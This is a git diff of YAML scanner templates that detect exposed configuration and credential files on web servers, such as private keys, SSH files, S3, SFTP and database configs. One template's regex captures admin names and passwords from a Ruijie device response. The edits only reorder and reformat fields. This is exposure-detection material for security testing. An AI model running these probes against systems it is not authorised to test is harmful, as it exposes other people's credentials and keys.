metadata: max-request: 1 + tags: config,exposure,php http: - method: GET diff --git a/http/exposures/configs/phpcs-config.yaml b/http/exposures/configs/phpcs-config.yaml index 1dcc33787e..aabf13e8fa 100644 --- a/http/exposures/configs/phpcs-config.yaml +++ b/http/exposures/configs/phpcs-config.yaml @@ -10,11 +10,11 @@ info: - https://github.com/squizlabs/PHP_CodeSniffer classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"phpcs.xml" tags: devops,exposure,php,phpcs diff --git a/http/exposures/configs/phpinfo-files.yaml b/http/exposures/configs/phpinfo-files.yaml index c863b4d0b7..18b0f0f148 100644 --- a/http/exposures/configs/phpinfo-files.yaml +++ b/http/exposures/configs/phpinfo-files.yaml @@ -40,6 +40,7 @@ http: - "{{BaseURL}}/l.php?act=phpinfo" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/phpsec-config.yaml b/http/exposures/configs/phpsec-config.yaml index 859524fb65..0093ff2d9a 100644 --- a/http/exposures/configs/phpsec-config.yaml +++ b/http/exposures/configs/phpsec-config.yaml @@ -8,11 +8,11 @@ info: reference: https://phpspec.net/en/stable/cookbook/configuration.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"phpspec.yml" tags: exposure,phpsec,php,devops,cicd @@ -23,6 +23,7 @@ http: - "{{BaseURL}}/phpspec.yml" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/phpstan-config.yaml b/http/exposures/configs/phpstan-config.yaml index 439412cd3d..336537f6e2 100644 --- a/http/exposures/configs/phpstan-config.yaml +++ b/http/exposures/configs/phpstan-config.yaml @@ -8,11 +8,11 @@ info: reference: https://phpstan.org/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"phpstan.neon" tags: devops,exposure diff --git a/http/exposures/configs/phpsys-info.yaml b/http/exposures/configs/phpsys-info.yaml index 2e5e917672..fcaa50bf50 100644 --- a/http/exposures/configs/phpsys-info.yaml +++ b/http/exposures/configs/phpsys-info.yaml @@ -1,31 +1,31 @@ -id: phpsys-info - -info: - name: phpSysInfo Exposure - author: fpatrik - severity: low - description: | - phpSysInfo: a customizable PHP script that displays information about your system nicely - reference: https://phpsysinfo.github.io/phpsysinfo/ - metadata: - max-request: 1 - shodan-query: html:"phpSysInfo" - verified: true - tags: config,exposure,phpsysinfo - -http: - - method: GET - path: - - "{{BaseURL}}/phpsysinfo/index.php?disp=bootstrap" - - matchers-condition: and - matchers: - - type: word - words: - - 'phpSysInfo' - - 'Hardware Information' - condition: and - - - type: status - status: - - 200 +id: phpsys-info + +info: + name: phpSysInfo Exposure + author: fpatrik + severity: low + description: | + phpSysInfo: a customizable PHP script that displays information about your system nicely + reference: https://phpsysinfo.github.io/phpsysinfo/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"phpSysInfo" + tags: config,exposure,phpsysinfo + +http: + - method: GET + path: + - "{{BaseURL}}/phpsysinfo/index.php?disp=bootstrap" + + matchers-condition: and + matchers: + - type: word + words: + - 'phpSysInfo' + - 'Hardware Information' + condition: and + + - type: status + status: + - 200 diff --git a/http/exposures/configs/pipfile-config.yaml b/http/exposures/configs/pipfile-config.yaml index 283ed1acbd..e5298ccfa5 100644 --- a/http/exposures/configs/pipfile-config.yaml +++ b/http/exposures/configs/pipfile-config.yaml @@ -8,11 +8,11 @@ info: reference: https://pypi.org/project classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Pipfile" tags: exposure,pip,devops,cicd diff --git a/http/exposures/configs/platformio-ini.yaml b/http/exposures/configs/platformio-ini.yaml index e25b58e6d5..c506ab14be 100644 --- a/http/exposures/configs/platformio-ini.yaml +++ b/http/exposures/configs/platformio-ini.yaml @@ -8,8 +8,8 @@ info: reference: - https://docs.platformio.org/en/stable/projectconf/index.html metadata: - max-request: 1 verified: true + max-request: 1 google-query: inurl:"/platformio.ini" github-query: '[platformio] language:INI' tags: config,exposure,platformio diff --git a/http/exposures/configs/plesk-stat.yaml b/http/exposures/configs/plesk-stat.yaml index b501d88568..683fe19fd1 100644 --- a/http/exposures/configs/plesk-stat.yaml +++ b/http/exposures/configs/plesk-stat.yaml @@ -5,15 +5,15 @@ info: author: th3.d1p4k severity: medium description: Webalizer log analyzer configuration was detected. + reference: + - http://www.webalizer.org classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - reference: - - http://www.webalizer.org - tags: config,exposure,plesk metadata: max-request: 1 + tags: config,exposure,plesk http: - method: GET diff --git a/http/exposures/configs/pre-commit-config.yaml b/http/exposures/configs/pre-commit-config.yaml index 0fa1149ba9..690d96f283 100644 --- a/http/exposures/configs/pre-commit-config.yaml +++ b/http/exposures/configs/pre-commit-config.yaml @@ -5,14 +5,14 @@ info: author: DhiyaneshDk severity: info description: Pre-commit configuration file was detected. + reference: https://pre-commit.com/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - reference: https://pre-commit.com/ metadata: - max-request: 2 verified: true + max-request: 2 tags: exposure,devops,config,cicd http: @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/pre-commit-config.yaml" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/procfile-config.yaml b/http/exposures/configs/procfile-config.yaml index c4ede98381..1f828cf7ef 100644 --- a/http/exposures/configs/procfile-config.yaml +++ b/http/exposures/configs/procfile-config.yaml @@ -7,11 +7,11 @@ info: description: Procfile configuration information was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Procfile" tags: devops,exposure,config @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - '^web:' diff --git a/http/exposures/configs/proftpd-config.yaml b/http/exposures/configs/proftpd-config.yaml index 0ab43ef733..2212040256 100644 --- a/http/exposures/configs/proftpd-config.yaml +++ b/http/exposures/configs/proftpd-config.yaml @@ -8,11 +8,11 @@ info: reference: http://www.proftpd.org/docs/howto/ConfigFile.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure,proftpd metadata: max-request: 1 + tags: config,exposure,proftpd http: - method: GET diff --git a/http/exposures/configs/prometheus-metrics.yaml b/http/exposures/configs/prometheus-metrics.yaml index c8b332ee32..8219df1755 100644 --- a/http/exposures/configs/prometheus-metrics.yaml +++ b/http/exposures/configs/prometheus-metrics.yaml @@ -23,6 +23,7 @@ http: - "{{BaseURL}}/api/metrics" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/protractor-config.yaml b/http/exposures/configs/protractor-config.yaml index c836a033a3..8bc30479a4 100644 --- a/http/exposures/configs/protractor-config.yaml +++ b/http/exposures/configs/protractor-config.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.protractortest.org/#/api-overview metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"protractor.conf.js" tags: devops,exposure,protractor,config diff --git a/http/exposures/configs/proxy-wpad-exposure.yaml b/http/exposures/configs/proxy-wpad-exposure.yaml index c645afa94f..150b6740fd 100644 --- a/http/exposures/configs/proxy-wpad-exposure.yaml +++ b/http/exposures/configs/proxy-wpad-exposure.yaml @@ -8,11 +8,11 @@ info: reference: https://en.wikipedia.org/wiki/Web_Proxy_Auto-Discovery_Protocol classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"wpad.dat" tags: config,exposure,proxy diff --git a/http/exposures/configs/psalm-config.yaml b/http/exposures/configs/psalm-config.yaml index 9dcd3ee820..7a5ae3ac2f 100644 --- a/http/exposures/configs/psalm-config.yaml +++ b/http/exposures/configs/psalm-config.yaml @@ -10,11 +10,11 @@ info: - https://psalm.dev/docs/running_psalm/configuration/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"psalm.xml" tags: devops,exposure,php,psalm,config diff --git a/http/exposures/configs/pubspec-config.yaml b/http/exposures/configs/pubspec-config.yaml index 8389f20a68..f6dd620656 100644 --- a/http/exposures/configs/pubspec-config.yaml +++ b/http/exposures/configs/pubspec-config.yaml @@ -10,11 +10,11 @@ info: - https://xeladu.medium.com/the-flutter-pubspec-yaml-in-detail-eee5729d9df7 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"pubspec.yaml" tags: exposure,devops,pubsec,config,cicd @@ -25,6 +25,7 @@ http: - "{{BaseURL}}/assets/pubspec.yaml" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/pyproject-toml.yaml b/http/exposures/configs/pyproject-toml.yaml index c6e6ebf6d5..779b3c3fd6 100644 --- a/http/exposures/configs/pyproject-toml.yaml +++ b/http/exposures/configs/pyproject-toml.yaml @@ -8,11 +8,11 @@ info: reference: https://pip.pypa.io/en/stable/reference/build-system/pyproject-toml/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"pyproject.toml" tags: exposure,pyproject,pip,devops,cicd diff --git a/http/exposures/configs/qdpm-info-leak.yaml b/http/exposures/configs/qdpm-info-leak.yaml index 2306f430e2..39ec9f41bf 100644 --- a/http/exposures/configs/qdpm-info-leak.yaml +++ b/http/exposures/configs/qdpm-info-leak.yaml @@ -7,9 +7,9 @@ info: description: qdPM 9.2 database credentials were discovered. reference: - https://www.exploit-db.com/exploits/50176 - tags: qdpm,exposure,edb metadata: max-request: 1 + tags: qdpm,exposure,edb http: - method: GET diff --git a/http/exposures/configs/rackup-config-ru.yaml b/http/exposures/configs/rackup-config-ru.yaml index 6d282579d3..499b76a788 100644 --- a/http/exposures/configs/rackup-config-ru.yaml +++ b/http/exposures/configs/rackup-config-ru.yaml @@ -10,11 +10,11 @@ info: - https://learn.co/lessons/config-ru-tutorial classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"config.ru" tags: exposure,files,config,rackup diff --git a/http/exposures/configs/rails-database-config.yaml b/http/exposures/configs/rails-database-config.yaml index 1344c47a22..36c05f74e9 100644 --- a/http/exposures/configs/rails-database-config.yaml +++ b/http/exposures/configs/rails-database-config.yaml @@ -4,15 +4,15 @@ info: name: Ruby on Rails Database Configuration File - Detect author: pdteam,geeknik severity: high + description: Ruby on Rails database configuration file was detected, which may contain database credentials. + reference: https://guides.rubyonrails.org/configuring.html#configuring-a-database classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - description: Ruby on Rails database configuration file was detected, which may contain database credentials. - reference: https://guides.rubyonrails.org/configuring.html#configuring-a-database - tags: config,exposure,rails metadata: max-request: 1 + tags: config,exposure,rails http: - method: GET diff --git a/http/exposures/configs/rakefile-disclosure.yaml b/http/exposures/configs/rakefile-disclosure.yaml index f5020f10fc..d25087026a 100644 --- a/http/exposures/configs/rakefile-disclosure.yaml +++ b/http/exposures/configs/rakefile-disclosure.yaml @@ -9,8 +9,8 @@ info: reference: - https://ruby.github.io/rake/doc/rakefile_rdoc.html metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Rakefile" tags: devops,exposure,rakefile,config,ruby,rails diff --git a/http/exposures/configs/redis-config.yaml b/http/exposures/configs/redis-config.yaml index df7fb4ff78..cfd2a80635 100644 --- a/http/exposures/configs/redis-config.yaml +++ b/http/exposures/configs/redis-config.yaml @@ -12,8 +12,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"redis.conf" tags: redis,exposure,config diff --git a/http/exposures/configs/robomongo-credential.yaml b/http/exposures/configs/robomongo-credential.yaml index b73d13fb0b..a27d08a799 100644 --- a/http/exposures/configs/robomongo-credential.yaml +++ b/http/exposures/configs/robomongo-credential.yaml @@ -4,15 +4,15 @@ info: name: RoboMongo Configuration File - Detect author: geeknik severity: high + description: A MongoDB credentials file used by RoboMongo was detected. + reference: https://robomongo.org/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - description: A MongoDB credentials file used by RoboMongo was detected. - reference: https://robomongo.org/ - tags: mongodb,robomongo,disclosure,config,exposure metadata: max-request: 2 + tags: mongodb,robomongo,disclosure,config,exposure http: - method: GET diff --git a/http/exposures/configs/rollup-js-config.yaml b/http/exposures/configs/rollup-js-config.yaml index 62ea80bdfa..a0bae385fd 100644 --- a/http/exposures/configs/rollup-js-config.yaml +++ b/http/exposures/configs/rollup-js-config.yaml @@ -9,11 +9,11 @@ info: - https://rollup.docschina.org/guide/en/#configuration-files classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"rollup.config.js" tags: exposure,devops,cicd,rollupjs diff --git a/http/exposures/configs/rubocop-config.yaml b/http/exposures/configs/rubocop-config.yaml index 577e18fc76..67a04453e3 100644 --- a/http/exposures/configs/rubocop-config.yaml +++ b/http/exposures/configs/rubocop-config.yaml @@ -10,11 +10,11 @@ info: - https://github.com/rubocop/rubocop classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"rubocop.yml" tags: exposure,files,config,ruby diff --git a/http/exposures/configs/ruijie-information-disclosure.yaml b/http/exposures/configs/ruijie-information-disclosure.yaml index e42cd1aae5..56f2959b3e 100644 --- a/http/exposures/configs/ruijie-information-disclosure.yaml +++ b/http/exposures/configs/ruijie-information-disclosure.yaml @@ -5,16 +5,16 @@ info: author: pikpikcu severity: high description: Ruijie login panel was detected and leaks authentication credentials. + reference: + - https://www.ruijienetworks.com/ + - https://www.cnblogs.com/cHr1s/p/14499858.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - reference: - - https://www.ruijienetworks.com/ - - https://www.cnblogs.com/cHr1s/p/14499858.html - tags: ruijie,config,exposure metadata: max-request: 1 + tags: ruijie,config,exposure http: - method: GET @@ -23,7 +23,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - '"role":"super_admin","name":"(.*)","password":"(.*)"' diff --git a/http/exposures/configs/ruijie-nbr1300g-exposure.yaml b/http/exposures/configs/ruijie-nbr1300g-exposure.yaml index 98650848b7..4f51023b2b 100644 --- a/http/exposures/configs/ruijie-nbr1300g-exposure.yaml +++ b/http/exposures/configs/ruijie-nbr1300g-exposure.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: ruijie,exposure metadata: max-request: 1 + tags: ruijie,exposure http: - raw: diff --git a/http/exposures/configs/ruijie-phpinfo.yaml b/http/exposures/configs/ruijie-phpinfo.yaml index 33be4c33ab..722955e764 100644 --- a/http/exposures/configs/ruijie-phpinfo.yaml +++ b/http/exposures/configs/ruijie-phpinfo.yaml @@ -5,13 +5,13 @@ info: author: pikpikcu severity: low description: Ruijie phpinfo configuration was detected. - classification: - cwe-id: CWE-200 reference: - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20phpinfo.view.php%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md - tags: phpinfo,rujjie,config,exposure,ruijie + classification: + cwe-id: CWE-200 metadata: max-request: 1 + tags: phpinfo,rujjie,config,exposure,ruijie http: - method: GET diff --git a/http/exposures/configs/s3cfg-config.yaml b/http/exposures/configs/s3cfg-config.yaml index 4a42f04cf5..a6ef38dfe5 100644 --- a/http/exposures/configs/s3cfg-config.yaml +++ b/http/exposures/configs/s3cfg-config.yaml @@ -5,15 +5,15 @@ info: author: geeknik,DhiyaneshDK severity: high description: S3CFG configuration file was detected. + reference: + - https://s3tools.org/kb/item14.htm classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - reference: - - https://s3tools.org/kb/item14.htm - tags: amazon,s3,exposure,config metadata: max-request: 1 + tags: amazon,s3,exposure,config http: - method: GET diff --git a/http/exposures/configs/s3cmd-config.yaml b/http/exposures/configs/s3cmd-config.yaml index 6addcfd8e7..283a9d9fe3 100644 --- a/http/exposures/configs/s3cmd-config.yaml +++ b/http/exposures/configs/s3cmd-config.yaml @@ -7,11 +7,11 @@ info: description: S3CMD configuration information was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: amazon,config,exposure metadata: max-request: 1 + tags: amazon,config,exposure http: - method: GET diff --git a/http/exposures/configs/saia-web-server-info.yaml b/http/exposures/configs/saia-web-server-info.yaml index 5fff0e7038..a641b1a1a2 100644 --- a/http/exposures/configs/saia-web-server-info.yaml +++ b/http/exposures/configs/saia-web-server-info.yaml @@ -5,15 +5,15 @@ info: author: DhiyaneshDk severity: info description: Saia PCD Web-Server configuration page was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.exploit-db.com/ghdb/6865 - tags: edb,config,exposure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 + tags: edb,config,exposure http: - method: GET diff --git a/http/exposures/configs/samba-config.yaml b/http/exposures/configs/samba-config.yaml index c673887301..5a960ed553 100644 --- a/http/exposures/configs/samba-config.yaml +++ b/http/exposures/configs/samba-config.yaml @@ -8,11 +8,11 @@ info: reference: https://www.samba.org/samba/docs/using_samba/ch06.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure,smb,samba metadata: max-request: 1 + tags: config,exposure,smb,samba http: - method: GET diff --git a/http/exposures/configs/scrutinizer-config.yaml b/http/exposures/configs/scrutinizer-config.yaml index 62985585e6..1f9b882706 100644 --- a/http/exposures/configs/scrutinizer-config.yaml +++ b/http/exposures/configs/scrutinizer-config.yaml @@ -10,11 +10,11 @@ info: - https://scrutinizer-ci.com/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"scrutinizer.yml" tags: exposure,scrutinizer,config diff --git a/http/exposures/configs/server-private-keys.yaml b/http/exposures/configs/server-private-keys.yaml index c4f87f7532..d4d3ed53b0 100644 --- a/http/exposures/configs/server-private-keys.yaml +++ b/http/exposures/configs/server-private-keys.yaml @@ -4,14 +4,14 @@ info: name: SSL/SSH/TLS/JWT Keys - Detect author: geeknik,R12W4N,j4vaovo severity: high + description: Private SSL, SSH, TLS, and JWT keys were detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - description: Private SSL, SSH, TLS, and JWT keys were detected. - tags: config,exposure metadata: max-request: 45 + tags: config,exposure http: - method: GET @@ -63,6 +63,7 @@ http: - "{{BaseURL}}/keys/{{Host}}.pem" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/sftp-config-exposure.yaml b/http/exposures/configs/sftp-config-exposure.yaml index d423bf7f9b..b2f01d1ba7 100644 --- a/http/exposures/configs/sftp-config-exposure.yaml +++ b/http/exposures/configs/sftp-config-exposure.yaml @@ -5,17 +5,17 @@ info: author: geeknik severity: high description: SFTP configuration file was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-200 reference: - https://blog.sucuri.net/2012/11/psa-sftpftp-password-exposure-via-sftp-config-json.html - https://www.acunetix.com/vulnerabilities/web/sftp-ftp-credentials-exposure/ - https://codexns.io/products/sftp_for_sublime/settings + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 github-query: filename:sftp-config.json tags: sftp,config,exposure diff --git a/http/exposures/configs/sftp-credentials-exposure.yaml b/http/exposures/configs/sftp-credentials-exposure.yaml index c8e96a50e6..0bdb7f2144 100644 --- a/http/exposures/configs/sftp-credentials-exposure.yaml +++ b/http/exposures/configs/sftp-credentials-exposure.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: config,ftp,exposure metadata: max-request: 2 + tags: config,ftp,exposure http: - method: GET diff --git a/http/exposures/configs/sftp-deployment-config.yaml b/http/exposures/configs/sftp-deployment-config.yaml index 453f6da768..71f626071d 100644 --- a/http/exposures/configs/sftp-deployment-config.yaml +++ b/http/exposures/configs/sftp-deployment-config.yaml @@ -6,15 +6,15 @@ info: severity: high description: | Atom SFTP deployment configuration file was detected. File contains server details and credentials. + reference: + - https://atom.io/packages/sftp-deployment classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - reference: - - https://atom.io/packages/sftp-deployment metadata: - max-request: 1 verified: true + max-request: 1 github-query: filename:deployment-config.json sftp tags: sftp,atom,config,exposure diff --git a/http/exposures/configs/ssh-authorized-keys.yaml b/http/exposures/configs/ssh-authorized-keys.yaml index 0b4dcdcab8..df3c2d91bf 100644 --- a/http/exposures/configs/ssh-authorized-keys.yaml +++ b/http/exposures/configs/ssh-authorized-keys.yaml @@ -5,15 +5,15 @@ info: author: geeknik severity: medium description: SSH authorized keys file was detected. + reference: + - https://www.ssh.com/academy/ssh/authorized-key classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - reference: - - https://www.ssh.com/academy/ssh/authorized-key - tags: config,exposure,ssh metadata: max-request: 2 + tags: config,exposure,ssh http: - method: GET diff --git a/http/exposures/configs/ssh-known-hosts.yaml b/http/exposures/configs/ssh-known-hosts.yaml index ee231711d8..ece056d5fe 100644 --- a/http/exposures/configs/ssh-known-hosts.yaml +++ b/http/exposures/configs/ssh-known-hosts.yaml @@ -5,15 +5,15 @@ info: author: geeknik severity: info description: SSH known hosts file was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://datacadamia.com/ssh/known_hosts - tags: config,exposure,ssh + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 2 + tags: config,exposure,ssh http: - method: GET diff --git a/http/exposures/configs/stestr-config.yaml b/http/exposures/configs/stestr-config.yaml index cf44ddd38a..89d5bcf5b9 100644 --- a/http/exposures/configs/stestr-config.yaml +++ b/http/exposures/configs/stestr-config.yaml @@ -10,11 +10,11 @@ info: - https://stestr.readthedocs.io/en/latest/MANUAL.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 github-query: filename:stestr.conf tags: exposure,stestr,config,files diff --git a/http/exposures/configs/svnserve-config.yaml b/http/exposures/configs/svnserve-config.yaml index 8bf57dc833..9828de1fda 100644 --- a/http/exposures/configs/svnserve-config.yaml +++ b/http/exposures/configs/svnserve-config.yaml @@ -8,11 +8,11 @@ info: reference: https://linux.die.net/man/8/svnserve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 google-query: intext:"configuration of the svnserve daemon" tags: config,exposure,svnserve diff --git a/http/exposures/configs/symfony-database-config.yaml b/http/exposures/configs/symfony-database-config.yaml index 9c4fd26b12..7697e04c8a 100644 --- a/http/exposures/configs/symfony-database-config.yaml +++ b/http/exposures/configs/symfony-database-config.yaml @@ -10,14 +10,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: config,exposure,symfony metadata: max-request: 1 + tags: config,exposure,symfony http: - method: GET path: - "{{BaseURL}}/config/databases.yml" + matchers-condition: and matchers: - type: word @@ -25,9 +26,11 @@ http: words: - "text/html" negative: true + - type: status status: - 200 + - type: word words: - "class:" diff --git a/http/exposures/configs/symfony-profiler.yaml b/http/exposures/configs/symfony-profiler.yaml index e0d6ef7c17..bd47005901 100644 --- a/http/exposures/configs/symfony-profiler.yaml +++ b/http/exposures/configs/symfony-profiler.yaml @@ -5,15 +5,15 @@ info: author: pdteam severity: high description: Symfony profiler was detected. + reference: https://symfony.com/doc/current/profiler.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"symfony Profiler" - reference: https://symfony.com/doc/current/profiler.html tags: config,exposure,symfony http: diff --git a/http/exposures/configs/symfony-security-config.yaml b/http/exposures/configs/symfony-security-config.yaml index 576b62bb45..874b7badea 100644 --- a/http/exposures/configs/symfony-security-config.yaml +++ b/http/exposures/configs/symfony-security-config.yaml @@ -10,11 +10,11 @@ info: - https://symfony.com/doc/current/reference/configuration/security.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure,symfony metadata: max-request: 2 + tags: config,exposure,symfony http: - method: GET diff --git a/http/exposures/configs/tox-ini.yaml b/http/exposures/configs/tox-ini.yaml index 039711496c..60bcd3c99b 100644 --- a/http/exposures/configs/tox-ini.yaml +++ b/http/exposures/configs/tox-ini.yaml @@ -5,14 +5,14 @@ info: author: geeknik severity: info description: Tox configuration file was detected. + reference: https://tox.wiki/en/latest/config.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - reference: https://tox.wiki/en/latest/config.html metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"tox.ini" tags: exposure,config,tox diff --git a/http/exposures/configs/ventrilo-config.yaml b/http/exposures/configs/ventrilo-config.yaml index 1ea971a160..7ecece0e9c 100644 --- a/http/exposures/configs/ventrilo-config.yaml +++ b/http/exposures/configs/ventrilo-config.yaml @@ -6,15 +6,15 @@ info: severity: high description: | Ventrilo configuration file was detected, The file 